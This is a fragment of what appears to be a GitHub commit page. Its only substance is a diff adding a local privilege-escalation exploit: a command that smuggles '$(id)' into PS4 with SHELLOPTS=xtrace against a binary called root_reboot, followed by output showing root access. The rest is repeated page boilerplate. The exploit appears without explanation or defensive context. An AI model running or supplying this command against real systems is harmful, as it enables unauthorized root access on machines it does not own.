+    $ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever
+    uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

0 comments on commit `8948e76`

Please sign in to comment.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Commit

There are no files selected for viewing

0 comments on commit `8948e76`

Commit

There are no files selected for viewing

0 comments on commit 8948e76

0 comments on commit `8948e76`